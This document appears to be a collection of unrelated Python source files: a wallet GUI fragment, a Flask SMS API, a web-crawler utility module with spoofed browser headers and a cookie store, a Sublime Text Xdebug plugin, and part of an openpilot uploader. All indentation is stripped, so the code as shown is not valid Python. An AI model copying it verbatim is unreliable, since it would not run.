cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
def show_masternode_dialog(self):
d = MasternodeDialog(self.masternode_manager, self)
d.exec_()
def proposals_changed(self):
"""Callback for when proposals change."""
if not self.masternode_manager:
return
self.update_proposals_tab()
|
app.py
|
from flask import json
from flask import jsonify
from flask import request
from flask import Flask
from flask import abort
from flask import make_response
from multiprocessing import Process, Value
import time
from listen import listenNewMessages
from setDefaultMessages import setDefaultMessages
from getDefaultMessages import getDefaultMessages
from TextLocal.sendMessage import sendSMS
from configparser import ConfigParser
app = Flask(__name__)
@app.route('/api/v1.0/set_messages', methods=['POST'])
def setMessages():
if not request.json or 'messages' not in request.json:
abort(400)
for reqs in request.json["messages"]:
if reqs["name"] == "GreetingMessage":
req_list_id = 0
elif reqs["name"] == "FoodPlan":
req_list_id = 1
elif reqs["name"] == "Assurance":
req_list_id = 2
elif reqs["name"] == "Reply":
req_list_id = 3
else:
abort(400)
setDefaultMessages(reqs["message"], req_list_id)
return jsonify(getDefaultMessages()), 201
@app.route('/api/v1.0/get_messages', methods=['GET'])
def getMessages():
return jsonify(getDefaultMessages())
@app.route('/api/v1.0/send_messages', methods=['POST'])
def sndMssg():
if not request.json:
abort(400)
cfg = ConfigParser()
cfg.read('config.ini')
return sendSMS(cfg.get('TextLocalKeys', 'TextLocal_api_key'), request.json["numbers"], request.json["message"])
@app.route('/api/v1.0/send_default_messages', methods=['POST'])
def sndDefaultMssg():
if not request.json:
abort(400)
if request.json["message_type"] == "GreetingMessage":
req_list_id = 0
elif request.json["message_type"] == "FoodPlan":
req_list_id = 1
elif request.json["message_type"] == "Assurance":
req_list_id = 2
elif request.json["message_type"] == "Reply":
req_list_id = 3
else:
abort(400)
message = getDefaultMessages()["messages"][req_list_id]["message"]
cfg = ConfigParser()
cfg.read('config.ini')
return sendSMS(cfg.get('TextLocalKeys', 'TextLocal_api_key'), request.json["numbers"], message)
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == "__main__":
p = Process(target=listenNewMessages)
p.start()
app.run(debug=True, use_reloader=False)
p.join()
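# Example usage (a minimal sketch, not part of the service itself): with the
# server running locally on Flask's default port 5000, a client might exercise
# the endpoints roughly like this. The host/port, greeting text and phone number
# are assumptions for illustration only; the expected "numbers" format depends
# on the TextLocal sendSMS helper.
#
#   import requests
#   base = "http://127.0.0.1:5000/api/v1.0"
#   # store a new default greeting
#   requests.post(base + "/set_messages",
#                 json={"messages": [{"name": "GreetingMessage", "message": "Hello!"}]})
#   # read back all default messages
#   print(requests.get(base + "/get_messages").json())
#   # send one of the stored defaults to a list of numbers
#   requests.post(base + "/send_default_messages",
#                 json={"message_type": "Reply", "numbers": "9190000000"})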
|
tools.py
|
"""
tools.py
written by ariyn
"""
from random import randrange
from urllib.request import Request, urlopen
from urllib.error import HTTPError
from copy import copy
from zipfile import ZipFile
from tempfile import NamedTemporaryFile
import json
import unicodedata
import re
import multiprocessing
import os
import time
import logging
from logging.handlers import RotatingFileHandler, SysLogHandler
GetHost = lambda url: url.replace("http://", "").replace("https://", "").split("/")[0]
lorem = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum."
def __randomHeader__(host=''):
version = (randrange(40, 55, 1), randrange(0, 60, 1), randrange(2500, 3500))
mozilla = "Mozilla/%d.0 (Windows NT 6.1)"%(version[0]//10)
webkit = "AppleWebKit/%d.%d (KHTML, like Gecko)"%(version[0], version[1])
chrome = "Chrome/%d.0.%d.115"%(version[1], version[2])
safari = "Safari/%d.%d"%(version[0], version[1])
agent = "%s %s %s %s"%(mozilla, webkit, chrome, safari)
return version, {
"Accept":"text/html,application/xhtml+xml,application/xml;"+
"q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4",
"Cache-Control":"max-age=0",
"Connection":"keep-alive",
"Host":host,
"Upgrade-Insecure-Requests":"1",
"User-Agent":agent
}
randomHeader = lambda host='': copy(__randomHeader__(host)[1])
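# For example, randomHeader("example.com") returns just the header dict (the
# randomized version tuple from __randomHeader__ is dropped), with "Host" set to
# "example.com" and a Chrome-style "User-Agent", suitable for passing to
# urllib.request.Request(url, headers=...).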
def multiDownload(path, referer, urls, interval=0.5, chunkSize=5):
"""
Download several URLs in parallel.
`urls` is a list of (filename, url) pairs; the list is split into chunks of
`chunkSize` and each chunk is downloaded in its own process, sleeping
`interval` seconds between requests.
(Original note: the urls structure must be changed.)
"""
headers = randomHeader()
headers["Referer"] = referer
processList = []
headers["Host"] = GetHost(urls[0][1])
newUrls = []
for i in range(0, len(urls), chunkSize):
newUrls.append(urls[i:i+chunkSize])
with Log() as log:
for i,v in enumerate(newUrls):
p = multiprocessing.Process(target=__downloadProcess__, args=(path, headers, v, interval, i, log))
processList.append(p)
p.start()
for p in processList:
p.join()
def __downloadProcess__(path, header, urls, interval, index, logger):
for i in urls:
try:
req = Request(i[1], headers=header)
res = urlopen(req)
x = open(path+"/"+i[0], "wb")
x.write(res.read())
x.close()
except HTTPError as e:
logger.error('download error to %s/%s', path, i[0], extra = {
"code":str(e.code),
"reason":e.reason,
"url":i[1]
})
time.sleep(interval)
def escapeFilenames(value):
"""
Escape a file name so it is safe for the Linux file system (slugify).
"""
value = unicodedata.normalize('NFKD', value)#.encode('utf-8')
value = re.sub(r'[^\w\s-]', '', value).strip().lower()
value = re.sub(r'[-\s]+', '-', value)
return value
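# For example, escapeFilenames("My File (1).txt") returns "my-file-1txt":
# punctuation is stripped, whitespace runs collapse to "-", and the result is lowercased.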
def compressFile(name, target, destination, removeOriginal=False):
"""
Compress every non-zip file in the `target` directory into `destination`/`name`.zip,
optionally removing the originals afterwards.
"""
try:
fileList = os.listdir(target)
except NotADirectoryError:
return 0
fileName = "%s/%s.zip"%(destination, name)
z = ZipFile(fileName, "w")
for i in fileList:
if ".zip" not in i:
z.write(target+"/"+i, i)
ret = z.testzip()
if ret is not None:
print("First bad file in %s.zip: %s" % (name, ret))
z.close()
if removeOriginal and ret is None:
for i in fileList:
os.remove(target+"/"+i)
os.rmdir(target)
return fileName
## the cookie manager must be a singleton instance
class __cookieManager__:
keywords = ["set-cookie", "host", "date"]
def __saveCookies__(self):
for key in self.changedCookie:
with open("%s/%s"%(self.userDir, key), "w") as file:
file.write(self.__get__(key))
def __init__(self):
from sys import platform
import atexit
from pathlib import Path
self.cookies = {}
self.changedCookie = set()
### Linux / macOS
if platform == "linux" or platform == "linux2" or platform == "darwin":
userDir = "%s/.cookies"%str(Path.home())
if not os.path.isdir(userDir):
os.mkdir(userDir)
elif platform == "win32":
userDir = "%s/Documents/cookies"%(os.environ['USERPROFILE'])
if not os.path.isdir(userDir):
os.mkdir(userDir)
entries = os.scandir(userDir)
for file in entries:
if not file.name.startswith('.') and file.is_file():
cookieStr = open(file.path, "r").read()
if cookieStr == "":
continue
cookie = __cookieManager__.parseCookie(cookieStr)
self.cookies[file.name] = {}
self.cookies[file.name].update(cookie)
self.userDir = userDir
# print(self.__saveCookies__)
atexit.register(self.__saveCookies__)
@staticmethod
def parseCookie(cookie):
pc = [i.strip().split("=") for i in cookie.split(";")]
pc = [i if len(i) == 2 else [i[0], i[0]] for i in pc]
return pc
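# For example, parseCookie("sid=abc123; HttpOnly") returns
# [["sid", "abc123"], ["HttpOnly", "HttpOnly"]]; attributes that carry no value
# are duplicated so that dict.update() in __add__ still receives key/value pairs.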
def __add__(self, domain, cookie):
if domain not in self.cookies:
self.cookies[domain] = {}
cookie = __cookieManager__.parseCookie(cookie)
# https://tools.ietf.org/html/rfc6265#section-5.2
self.cookies[domain].update(cookie)
self.changedCookie.add(domain)
def __get__(self, domain):
# print(domain)
if domain in self.cookies:
return "; ".join(["%s=%s"%(k, v) for k,v in self.cookies[domain].items()])
else:
return ""
def __getitem__(self, key):
return self.__get__(key)
def __setitem__(self, key, value):
return self.__add__(key, value)
class Log:
debugFile = NamedTemporaryFile(suffix=".log", prefix="crawl-", delete=False)
path = "./log/crawl.log"
debug = False
format = "%(asctime)-15s %(url)s %(message)s %(code)-3s\n\t%(reason)s\n"
def __init__(self, name="crawler", path=None, format=None, debug=False):
debug = debug or self.debug
if format is None:
format = Log.format
self.log = logging.getLogger(name)
if not hasattr(self.log, "stdFileHandler"):
setattr(self.log, "stdFileHandler", False)
setattr(self.log, "stdStreamHandler", False)
self.log.setLevel(logging.INFO if not debug else logging.DEBUG)
self.formatter = logging.Formatter(format)
if path is not None:
self.path = path
# if debug:
# self.path = self.debugFile.name
if not self.log.stdFileHandler:
fileHandler = RotatingFileHandler(self.path, maxBytes=1024*1024)
fileHandler.setFormatter(self.formatter)
self.log.addHandler(fileHandler)
self.log.stdFileHandler = True
if debug and not self.log.stdStreamHandler:
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(self.formatter)
self.log.addHandler(streamHandler)
self.log.stdStreamHandler = True
def __enter__(self):
self.log.__parent__ = self
return self.log
def __exit__(self, exc_type, exc_value, traceback):
pass
CookieManager = __cookieManager__()
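# Example usage (a minimal sketch; the domain, cookie value and import style are
# assumptions for illustration, and the default log path "./log/crawl.log"
# requires the ./log directory to exist):
#
#   from tools import CookieManager, Log, randomHeader
#   CookieManager["example.com"] = "sid=abc123"          # parsed and persisted at exit
#   headers = randomHeader("example.com")
#   headers["Cookie"] = CookieManager["example.com"]     # "sid=abc123"
#   with Log("crawler") as log:
#       log.info("fetching %s", "http://example.com",
#                extra={"url": "http://example.com", "code": "200", "reason": "OK"})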
|
main.py
|
import sublime
import sublime_plugin
import os
import sys
import threading
# Load modules
try:
from .xdebug import *
except:
from xdebug import *
# Set Python libraries from system installation
python_path = config.get_value(S.KEY_PYTHON_PATH)
if python_path:
python_path = os.path.normpath(python_path.replace("\\", "/"))
python_dynload = os.path.join(python_path, 'lib-dynload')
if python_dynload not in sys.path:
sys.path.append(python_dynload)
# Define path variables
try:
S.PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
S.PACKAGE_FOLDER = os.path.basename(S.PACKAGE_PATH)
except:
pass
# Initialize package
sublime.set_timeout(lambda: load.xdebug(), 1000)
# Define event listener for view(s)
class EventListener(sublime_plugin.EventListener):
def on_load(self, view):
filename = view.file_name()
# Scroll the view to current breakpoint line
if filename and filename in S.SHOW_ROW_ONLOAD:
V.show_at_row(view, S.SHOW_ROW_ONLOAD[filename])
del S.SHOW_ROW_ONLOAD[filename]
# Render breakpoint markers
sublime.set_timeout(lambda: V.render_regions(view), 0)
def on_activated(self, view):
# Render breakpoint markers
V.render_regions(view)
def on_post_save(self, view):
filename = view.file_name()
# Render breakpoint markers
V.render_regions(view)
# Update config when settings file or sublime-project has been saved
if filename and (filename.endswith(S.FILE_PACKAGE_SETTINGS) or filename.endswith('.sublime-project')):
config.load_package_values()
config.load_project_values()
#TODO: Save new location of breakpoints on save
def on_selection_modified(self, view):
# Show details in output panel of selected variable in context window
if view.name() == V.TITLE_WINDOW_CONTEXT:
V.show_context_output(view)
elif view.name() == V.TITLE_WINDOW_BREAKPOINT:
V.toggle_breakpoint(view)
elif view.name() == V.TITLE_WINDOW_STACK:
V.toggle_stack(view)
elif view.name() == V.TITLE_WINDOW_WATCH:
V.toggle_watch(view)
else:
pass
class XdebugBreakpointCommand(sublime_plugin.TextCommand):
"""
Add/Remove breakpoint(s) for rows (line numbers) in selection.
"""
def run(self, edit, rows=None, condition=None, enabled=None, filename=None):
# Get filename in current view and check if is a valid filename
if filename is None:
filename = self.view.file_name()
if not filename or not os.path.isfile(filename):
return
# Add entry for file in breakpoint data
if filename not in S.BREAKPOINT:
S.BREAKPOINT[filename] = {}
# When no rows are defined, use selected rows (line numbers), filtering empty rows
if rows is None:
rows = V.region_to_rows(self.view.sel(), filter_empty=True)
# Loop through rows
for row in rows:
expression = None
if condition is not None and len(condition.strip()) > 0:
expression = condition
# Check if breakpoint exists
breakpoint_exists = row in S.BREAKPOINT[filename]
# Disable/Remove breakpoint
if breakpoint_exists:
if S.BREAKPOINT[filename][row]['id'] is not None and session.is_connected(show_status=True):
async_session = session.SocketHandler(session.ACTION_REMOVE_BREAKPOINT, breakpoint_id=S.BREAKPOINT[filename][row]['id'])
async_session.start()
if enabled is False:
S.BREAKPOINT[filename][row]['enabled'] = False
elif enabled is None:
del S.BREAKPOINT[filename][row]
# Add/Enable breakpoint
if not breakpoint_exists or enabled is True:
if row not in S.BREAKPOINT[filename]:
S.BREAKPOINT[filename][row] = { 'id': None, 'enabled': True, 'expression': expression }
else:
S.BREAKPOINT[filename][row]['enabled'] = True
if condition is not None:
S.BREAKPOINT[filename][row]['expression'] = expression
else:
expression = S.BREAKPOINT[filename][row]['expression']
if session.is_connected(show_status=True):
async_session = session.SocketHandler(session.ACTION_SET_BREAKPOINT, filename=filename, lineno=row, expression=expression)
async_session.start()
# Render breakpoint markers
V.render_regions()
# Update breakpoint list
try:
if V.has_debug_view(V.TITLE_WINDOW_BREAKPOINT):
V.show_content(V.DATA_BREAKPOINT)
except:
pass
# Save breakpoint data to file
util.save_breakpoint_data()
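# Other commands in this plugin drive this command programmatically, e.g.
#   view.run_command('xdebug_breakpoint', {'rows': [lineno], 'enabled': True, 'filename': filename})
# (see XdebugConditionalBreakpointCommand and XdebugRunToLineCommand below).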
class XdebugConditionalBreakpointCommand(sublime_plugin.TextCommand):
"""
Add conditional breakpoint(s) for rows (line numbers) in selection.
"""
def run(self, edit):
self.view.window().show_input_panel('Breakpoint condition', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, condition):
self.view.run_command('xdebug_breakpoint', {'condition': condition, 'enabled': True})
def on_change(self, line):
pass
def on_cancel(self):
pass
class XdebugClearBreakpointsCommand(sublime_plugin.TextCommand):
"""
Clear breakpoints in selected view.
"""
def run(self, edit):
filename = self.view.file_name()
if filename and filename in S.BREAKPOINT:
rows = H.dictionary_keys(S.BREAKPOINT[filename])
self.view.run_command('xdebug_breakpoint', {'rows': rows, 'filename': filename})
# Continue debug session when breakpoints are cleared on current script being debugged
if S.BREAKPOINT_ROW and self.view.file_name() == S.BREAKPOINT_ROW['filename']:
self.view.window().run_command('xdebug_execute', {'command': 'run'})
def is_enabled(self):
filename = self.view.file_name()
if filename and S.BREAKPOINT and filename in S.BREAKPOINT and S.BREAKPOINT[filename]:
return True
return False
def is_visible(self):
filename = self.view.file_name()
if filename and S.BREAKPOINT and filename in S.BREAKPOINT and S.BREAKPOINT[filename]:
return True
return False
class XdebugClearAllBreakpointsCommand(sublime_plugin.WindowCommand):
"""
Clear breakpoints from all views.
"""
def run(self):
view = sublime.active_window().active_view()
# Unable to run to line when no view available
if view is None:
return
for filename, breakpoint_data in S.BREAKPOINT.items():
if breakpoint_data:
rows = H.dictionary_keys(breakpoint_data)
view.run_command('xdebug_breakpoint', {'rows': rows, 'filename': filename})
# Continue debug session when breakpoints are cleared on current script being debugged
self.window.run_command('xdebug_execute', {'command': 'run'})
def is_enabled(self):
if S.BREAKPOINT:
for filename, breakpoint_data in S.BREAKPOINT.items():
if breakpoint_data:
return True
return False
def is_visible(self):
if S.BREAKPOINT:
for filename, breakpoint_data in S.BREAKPOINT.items():
if breakpoint_data:
return True
return False
class XdebugRunToLineCommand(sublime_plugin.WindowCommand):
"""
Run script to current selected line in view, ignoring all other breakpoints.
"""
def run(self):
view = sublime.active_window().active_view()
# Unable to run to line when no view available
if view is None:
return
# Determine filename for current view and check if is a valid filename
filename = view.file_name()
if not filename or not os.path.isfile(filename):
return
# Get first line from selected rows and make sure it is not empty
rows = V.region_to_rows(filter_empty=True)
if rows is None or len(rows) == 0:
return
lineno = rows[0]
# Check if breakpoint does not already exists
breakpoint_exists = False
if filename in S.BREAKPOINT and lineno in S.BREAKPOINT[filename]:
breakpoint_exists = True
# Store line number and filename for temporary breakpoint in session
if not breakpoint_exists:
S.BREAKPOINT_RUN = { 'filename': filename, 'lineno': lineno }
# Set breakpoint and run script
view.run_command('xdebug_breakpoint', {'rows': [lineno], 'enabled': True, 'filename': filename})
self.window.run_command('xdebug_execute', {'command': 'run'})
def is_enabled(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
def is_visible(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
class XdebugSessionStartCommand(sublime_plugin.WindowCommand):
"""
Start Xdebug session, listen for request response from debugger engine.
"""
def run(self, launch_browser=False, restart=False):
# Define new session with DBGp protocol
S.SESSION = protocol.Protocol()
S.SESSION_BUSY = False
S.BREAKPOINT_EXCEPTION = None
S.BREAKPOINT_ROW = None
S.CONTEXT_DATA.clear()
async_session = session.SocketHandler(session.ACTION_WATCH, check_watch_view=True)
async_session.start()
# Remove temporary breakpoint
if S.BREAKPOINT_RUN is not None and S.BREAKPOINT_RUN['filename'] in S.BREAKPOINT and S.BREAKPOINT_RUN['lineno'] in S.BREAKPOINT[S.BREAKPOINT_RUN['filename']]:
self.window.active_view().run_command('xdebug_breakpoint', {'rows': [S.BREAKPOINT_RUN['lineno']], 'filename': S.BREAKPOINT_RUN['filename']})
S.BREAKPOINT_RUN = None
# Set debug layout
self.window.run_command('xdebug_layout')
# Launch browser
if launch_browser or (config.get_value(S.KEY_LAUNCH_BROWSER) and not restart):
util.launch_browser()
# Start thread which will run method that listens for response on configured port
threading.Thread(target=self.listen).start()
def listen(self):
# Start listening for response from debugger engine
S.SESSION.listen()
# On connect run method which handles connection
if S.SESSION and S.SESSION.connected:
sublime.set_timeout(self.connected, 0)
def connected(self):
sublime.set_timeout(lambda: sublime.status_message('Xdebug: Connected'), 100)
async_session = session.SocketHandler(session.ACTION_INIT)
async_session.start()
def is_enabled(self):
if S.SESSION:
return False
return True
def is_visible(self, launch_browser=False):
if S.SESSION:
return False
if launch_browser and (config.get_value(S.KEY_LAUNCH_BROWSER) or not config.get_value(S.KEY_URL)):
return False
return True
class XdebugSessionRestartCommand(sublime_plugin.WindowCommand):
def run(self):
self.window.run_command('xdebug_session_stop', {'restart': True})
self.window.run_command('xdebug_session_start', {'restart': True})
sublime.set_timeout(lambda: sublime.status_message('Xdebug: Restarted debugging session. Reload page to continue debugging.'), 100)
def is_enabled(self):
if S.SESSION:
return True
return False
def is_visible(self):
if S.SESSION:
return True
return False
class XdebugSessionStopCommand(sublime_plugin.WindowCommand):
"""
Stop Xdebug session, close connection and stop listening to debugger engine.
"""
def run(self, close_windows=False, launch_browser=False, restart=False):
try:
S.SESSION.clear()
except:
pass
finally:
S.SESSION = None
S.SESSION_BUSY = False
S.BREAKPOINT_EXCEPTION = None
S.BREAKPOINT_ROW = None
S.CONTEXT_DATA.clear()
async_session = session.SocketHandler(session.ACTION_WATCH, check_watch_view=True)
async_session.start()
# Remove temporary breakpoint
if S.BREAKPOINT_RUN is not None and S.BREAKPOINT_RUN['filename'] in S.BREAKPOINT and S.BREAKPOINT_RUN['lineno'] in S.BREAKPOINT[S.BREAKPOINT_RUN['filename']]:
self.window.active_view().run_command('xdebug_breakpoint', {'rows': [S.BREAKPOINT_RUN['lineno']], 'filename': S.BREAKPOINT_RUN['filename']})
S.BREAKPOINT_RUN = None
# Launch browser
if launch_browser or (config.get_value(S.KEY_LAUNCH_BROWSER) and not restart):
util.launch_browser()
# Close or reset debug layout
if close_windows or config.get_value(S.KEY_CLOSE_ON_STOP):
if config.get_value(S.KEY_DISABLE_LAYOUT):
self.window.run_command('xdebug_layout', {'close_windows': True})
else:
self.window.run_command('xdebug_layout', {'restore': True})
else:
self.window.run_command('xdebug_layout')
# Render breakpoint markers
V.render_regions()
def is_enabled(self):
if S.SESSION:
return True
return False
def is_visible(self, close_windows=False, launch_browser=False):
if S.SESSION:
if close_windows and config.get_value(S.KEY_CLOSE_ON_STOP):
return False
if launch_browser and (config.get_value(S.KEY_LAUNCH_BROWSER) or not config.get_value(S.KEY_URL)):
return False
return True
return False
class XdebugExecuteCommand(sublime_plugin.WindowCommand):
"""
Execute command, handle breakpoints and reload session when page execution has completed.
Keyword arguments:
command -- Command to send to debugger engine.
"""
def run(self, command=None):
async_session = session.SocketHandler(session.ACTION_EXECUTE, command=command)
async_session.start()
def is_enabled(self):
return session.is_connected()
class XdebugContinueCommand(sublime_plugin.WindowCommand):
"""
Continuation commands when on breakpoint, show menu by default if no command has been passed as argument.
Keyword arguments:
command -- Continuation command to execute.
"""
commands = H.new_dictionary()
commands[dbgp.RUN] = 'Run'
commands[dbgp.STEP_OVER] = 'Step Over'
commands[dbgp.STEP_INTO] = 'Step Into'
commands[dbgp.STEP_OUT] = 'Step Out'
commands[dbgp.STOP] = 'Stop'
commands[dbgp.DETACH] = 'Detach'
command_index = H.dictionary_keys(commands)
command_options = H.dictionary_values(commands)
def run(self, command=None):
if not command or command not in self.commands:
self.window.show_quick_panel(self.command_options, self.callback)
else:
self.callback(command)
def callback(self, command):
if command == -1 or S.SESSION_BUSY:
return
if isinstance(command, int):
command = self.command_index[command]
self.window.run_command('xdebug_execute', {'command': command})
def is_enabled(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
def is_visible(self):
return S.BREAKPOINT_ROW is not None and session.is_connected()
class XdebugStatusCommand(sublime_plugin.WindowCommand):
"""
Get status from debugger engine.
"""
def run(self):
async_session = session.SocketHandler(session.ACTION_STATUS)
async_session.start()
def is_enabled(self):
return session.is_connected()
def is_visible(self):
return session.is_connected()
class XdebugEvaluateCommand(sublime_plugin.WindowCommand):
def run(self):
self.window.show_input_panel('Evaluate', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, expression):
async_session = session.SocketHandler(session.ACTION_EVALUATE, expression=expression)
async_session.start()
def on_change(self, expression):
pass
def on_cancel(self):
pass
def is_enabled(self):
return session.is_connected()
def is_visible(self):
return session.is_connected()
class XdebugUserExecuteCommand(sublime_plugin.WindowCommand):
"""
Open input panel, allowing user to execute arbitrary command according to DBGp protocol.
Note: Transaction ID is automatically generated by session module.
"""
def run(self):
self.window.show_input_panel('DBGp command', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, line):
# Split command and arguments, define arguments when only command is defined.
if ' ' in line:
command, args = line.split(' ', 1)
else:
command, args = line, ''
async_session = session.SocketHandler(session.ACTION_USER_EXECUTE, command=command, args=args)
async_session.start()
def on_change(self, line):
pass
def on_cancel(self):
pass
def is_enabled(self):
return session.is_connected()
def is_visible(self):
return session.is_connected()
class XdebugWatchCommand(sublime_plugin.WindowCommand):
"""
Add/Edit/Remove watch expression.
"""
def run(self, clear=False, edit=False, remove=False, update=False):
self.edit = edit
self.remove = remove
self.watch_index = None
# Clear watch expressions in list
if clear:
try:
# Python 3.3+
S.WATCH.clear()
except AttributeError:
del S.WATCH[:]
# Update watch view
self.update_view()
# Edit or remove watch expression
elif edit or remove:
# Generate list with available watch expressions
watch_options = []
for index, item in enumerate(S.WATCH):
watch_item = '[{status}] - {expression}'.format(expression=item['expression'], status='enabled' if item['enabled'] else 'disabled')
watch_options.append(watch_item)
self.window.show_quick_panel(watch_options, self.callback)
elif update:
self.update_view()
# Set watch expression
else:
self.set_expression()
def callback(self, index):
# User has cancelled action
if index == -1:
return
# Make sure index is valid integer
if isinstance(index, int) or H.is_digit(index):
self.watch_index = int(index)
# Edit watch expression
if self.edit:
self.set_expression()
# Remove watch expression
else:
S.WATCH.pop(self.watch_index)
# Update watch view
self.update_view()
def on_done(self, expression):
# User did not set expression
if not expression:
return
# Check if expression is not already defined
matches = [x for x in S.WATCH if x['expression'] == expression]
if matches:
sublime.status_message('Xdebug: Watch expression already defined.')
return
# Add/Edit watch expression in session
watch = {'expression': expression, 'enabled': True, 'value': None, 'type': None}
if self.watch_index is not None and isinstance(self.watch_index, int):
try:
S.WATCH[self.watch_index]['expression'] = expression
except:
S.WATCH.insert(self.watch_index, watch)
else:
S.WATCH.append(watch)
# Update watch view
self.update_view()
def on_change(self, line):
pass
def on_cancel(self):
pass
def set_expression(self):
# Show user input for setting watch expression
self.window.show_input_panel('Watch expression', '', self.on_done, self.on_change, self.on_cancel)
def update_view(self):
async_session = session.SocketHandler(session.ACTION_WATCH, check_watch_view=True)
async_session.start()
# Save watch data to file
util.save_watch_data()
def is_visible(self, clear=False, edit=False, remove=False):
if (clear or edit or remove) and not S.WATCH:
return False
return True
class XdebugViewUpdateCommand(sublime_plugin.TextCommand):
"""
Update content of sublime.Edit object in view, instead of using begin_edit/end_edit.
Keyword arguments:
data -- Content data to populate sublime.Edit object with.
readonly -- Make sublime.Edit object read only.
"""
def run(self, edit, data=None, readonly=False):
view = self.view
view.set_read_only(False)
view.erase(edit, sublime.Region(0, view.size()))
if data is not None:
view.insert(edit, 0, data)
if readonly:
view.set_read_only(True)
class XdebugLayoutCommand(sublime_plugin.WindowCommand):
"""
Toggle between debug and default window layouts.
"""
def run(self, restore=False, close_windows=False, keymap=False):
# Get active window
window = sublime.active_window()
# Do not restore layout or close windows while debugging
if S.SESSION and (restore or close_windows or keymap):
return
# Set layout, unless user disabled debug layout
if not config.get_value(S.KEY_DISABLE_LAYOUT):
if restore or keymap:
V.set_layout('normal')
else:
V.set_layout('debug')
# Close all debugging related windows
if close_windows or restore or keymap:
V.close_debug_windows()
return
# Reset data in debugging related windows
V.show_content(V.DATA_BREAKPOINT)
V.show_content(V.DATA_CONTEXT)
V.show_content(V.DATA_STACK)
V.show_content(V.DATA_WATCH)
panel = window.get_output_panel('xdebug')
panel.run_command("xdebug_view_update")
# Close output panel
window.run_command('hide_panel', {"panel": 'output.xdebug'})
def is_enabled(self, restore=False, close_windows=False):
disable_layout = config.get_value(S.KEY_DISABLE_LAYOUT)
if close_windows and (not disable_layout or not V.has_debug_view()):
return False
if restore and disable_layout:
return False
return True
def is_visible(self, restore=False, close_windows=False):
if S.SESSION:
return False
disable_layout = config.get_value(S.KEY_DISABLE_LAYOUT)
if close_windows and (not disable_layout or not V.has_debug_view()):
return False
if restore and disable_layout:
return False
if restore:
try:
return sublime.active_window().get_layout() == config.get_value(S.KEY_DEBUG_LAYOUT, S.LAYOUT_DEBUG)
except:
pass
return True
class XdebugSettingsCommand(sublime_plugin.WindowCommand):
"""
Show settings file.
"""
def run(self, default=True):
# Show default settings in package when available
if default and S.PACKAGE_FOLDER is not None:
package = S.PACKAGE_FOLDER
# Otherwise show User defined settings
else:
package = "User"
# Strip .sublime-package of package name for syntax file
package_extension = ".sublime-package"
if package.endswith(package_extension):
package = package[:-len(package_extension)]
# Open settings file
self.window.run_command('open_file', {'file': '${packages}/' + package + '/' + S.FILE_PACKAGE_SETTINGS})
|
uploader.py
|
#!/usr/bin/env python
import os
import re
import time
import stat
import json
import random
import ctypes
import inspect
import requests
import traceback
import threading
import subprocess
from collections import Counter
from selfdrive.swaglog import cloudlog
from selfdrive.loggerd.config import ROOT
from common.params import Params
from common.api import api_get
fake_upload = os.getenv("FAKEUPLOAD") is not None
def raise_on_thread(t, exctype):
'''Raise an exception of type exctype in the thread t (looked up by thread id).'''
for ctid, tobj in threading._active.items():
if tobj is t:
tid = ctid
break
else:
raise Exception("Could not find thread")
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid),
ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
def listdir_with_creation_date(d):
lst = os.listdir(d)
for fn in lst:
try:
st = os.stat(os.path.join(d, fn))
ctime = st[stat.ST_CTIME]
yield (ctime, fn)
except OSError:
cloudlog.exception("listdir_with_creation_date: stat failed?")
yield (None, fn)
def listdir_by_creation_date(d):
times_and_paths = list(listdir_with_creation_date(d))
return [path for _, path in sorted(times_and_paths)]
def clear_locks(root):
for logname in os.listdir(root):
path = os.path.join(root, logname)
try:
for fname in os.listdir(path):
if fname.endswith(".lock"):
os.unlink(os.path.join(path, fname))
except OSError:
cloudlog.exception("clear_locks failed")
def is_on_wifi():
# ConnectivityManager.getActiveNetworkInfo()
try:
result = subprocess.check_output(["service", "call", "connectivity", "2"]).strip().split("\n")
except subprocess.CalledProcessError:
return False
data = ''.join(''.join(w.decode("hex")[::-1] for w in l[14:49].split()) for l in result[1:])
is_wifi = "\x00".join("WIFI") in data
is_iphone = "\x00".join("iPhone") in data
return is_wifi and not is_iphone
def is_on_hotspot():
try:
result = subprocess.check_output(["ifconfig", "wlan0"])
